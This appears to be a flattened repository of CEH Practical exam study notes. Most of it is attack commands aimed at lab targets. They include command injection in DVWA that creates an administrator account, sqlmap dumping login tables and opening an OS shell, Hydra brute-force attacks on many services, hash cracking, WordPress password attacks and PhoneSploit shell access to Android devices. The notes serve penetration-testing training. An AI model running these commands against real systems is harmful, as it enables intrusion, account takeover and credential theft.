├── Android
├── CEH-Prac Guide
├── Command Injection DVWA
├── Cryptography
├── Enumeration
├── Enumeration Domain Users
├── SQL Injection
├── Scanning Nmap
├── Stegnography
├── WireShark DDOS
└── WordPress Brusteforce

/Android:
--------------------------------------------------------------------------------
PhoneSploit
https://n00bie.medium.com/hacking-android-using-phonesploit-ffbb2a899e6

apt-get install adb
git clone github.com/01010000/phonesploit
cd phonesploit
python3 phonesploit.py
3 (Connect to new phone)
Add IP address of android device
4 (Access shell on phone)
IP address again of android device
pwd
ls
cd sdcard
ls
cd downloads
cat accnt-info.txt
--------------------------------------------------------------------------------
/CEH-Prac Guide:
--------------------------------------------------------------------------------
Guide for CEH-Practical Exam

This file contains the commands, tools and examples to crack the respective challenges.

Gitbook Guide
https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master
https://adithyanak.gitbook.io/ceh-practical/
https://github.com/Samson-DVS/CEH-Practical-Notes (Very useful)
https://github.com/nirangadh/ceh-practical (Very useful)
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html (SMB Checklist Enumeration)
https://github.com/Samsar4/Ethical-Hacking-Labs
https://github.com/Rezkmike/CEH_Practical_Preparation (very useful tools)
https://nx7.me/posts/cehreview/
https://chirag-singla.notion.site/CEH-Practical-Preparation-7f2b77651cd144e8872f2f5a30155052

IMP
https://github.com/System-CTL/CEH_CHEAT_SHEET
--------------------------------------------------------------------------------
/Command Injection DVWA:
--------------------------------------------------------------------------------
Login to DVWA
Set the Security Level to "Low"
Click on the Command Injection tab
Check whether the parameter is vulnerable (it is)
Now enter the system commands
| hostname
| whoami
| dir C:\path.txt
| type path.txt

| net user
| net user Test /Add
| net user
| net user Test
| net localgroup Administrators Test /Add

Successfully created the "Test" user account.
--------------------------------------------------------------------------------
/Cryptography:
--------------------------------------------------------------------------------
Hash identifier and Hash cracking

Hash Identifier
https://www.onlinehashcrack.com/hash-identification.php

Hash-identifier (CLI)

Hash Crack
https://crackstation.net/
https://hashes.com/en/decrypt/hash

hashcat -a 0 -m 900 hash.txt /rockyou.txt

-a     attack mode (0 = wordlist, 3 = mask/brute force)
-m     hash type
900    MD4
1000   NTLM
1800   SHA512CRYPT
110    SHA1 with salt
0      MD5
100    SHA1
1400   SHA256
3200   BCRYPT
160    HMAC-SHA1

John
1. First analyze hash type - `john hashfile.hash`
2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash`


Hydra

- **FTP**: hydra -l user -P passlist.txt ftp://10.10.46.122

  hydra -L userlist.txt -P passlist.txt ftp://10.10.46.122

- SSH: hydra -l -P 10.10.46.122 -t 4 ssh
- Post Web Form: hydra -l -P 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

- `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
- `hydra -l root -P passwords.txt [-t 32]  ftp`
- `hydra -L usernames.txt -P pass.txt  mysql`
- `hydra -l USERNAME -P /path/to/passwords.txt -f  pop3 -V`
- `hydra -V -f -L -P  rdp://`
- `hydra -P common-snmp-community-strings.txt target.com snmp`
- `hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1`
- `hydra -l root -P passwords.txt  ssh`
--------------------------------------------------------------------------------
/Enumeration:
--------------------------------------------------------------------------------
SNMP Enumeration

nmap -sU -p 161 IP
snmp-check IP
Displays network info, network interfaces, network IP, routing info, TCP connections and listening ports, processes, storage info, file system and device info.


NetBIOS Enumeration

nbtstat -a IP
-a   NetBIOS name table
-c   list contents of NetBIOS name cache

net use
Displays connection status, shared folders/drives and network information.

--------------------------------------------------------------------------------
/Enumeration Domain Users:
--------------------------------------------------------------------------------
NET USERS /DOMAIN >USERS.TXT
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
--------------------------------------------------------------------------------
/SQL Injection:
--------------------------------------------------------------------------------
OWASP ZAP
Open ZAP
Add the website name to Autoscan
Click on the Alert tab to see the vulnerabilities

------------------------------------------------------------------------------------------------------------------------------------------------------

SQL MAP

Open the vulnerable website
Copy the cookie from the inspect element
Open the terminal to use sqlmap
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

You will get all the usernames and passwords of the website.

------------------------------------------------------------------------------------------------------------------------------------------------------

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the interactive OS shell.

------------------------------------------------------------------------------------------------------------------------------------------------------

mysql -u qdpmadmin -h 192.168.1.8 -p
show databases;
use qdpm;
show tables;
select * from users;
show databases;
use staff;
show tables;
select * from login;
select * from user;

Use this when you have the username and password for the database.

------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Scanning Nmap:
--------------------------------------------------------------------------------
nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.1

nmap -f IP
nmap -sn -PR IP
nmap -sn -PE ip-range
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O IP
nmap -A IP

-sn   disable port scan
-PR   ARP ping scan
-PU   UDP ping scan
-PE   ICMP ECHO ping scan
-f    splits IP packets into fragments

nmap --script smb-os-discovery.nse IP
Displays OS, computer name, domain, workgroup and ports.

--------------------------------------------------------------------------------
/Stegnography:
--------------------------------------------------------------------------------
snow.exe -C -p "test" confidential.txt

-C   compressing / uncompressing
-p   password


Open Stego
GUI tool
--------------------------------------------------------------------------------
/WireShark DDOS:
--------------------------------------------------------------------------------
https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack

To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords : http.request.method == POST

--------------------------------------------------------------------------------
/WordPress Brusteforce:
--------------------------------------------------------------------------------
wpscan --url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt
wpscan --url https://example/ --enumerate u (To enumerate the user)
--------------------------------------------------------------------------------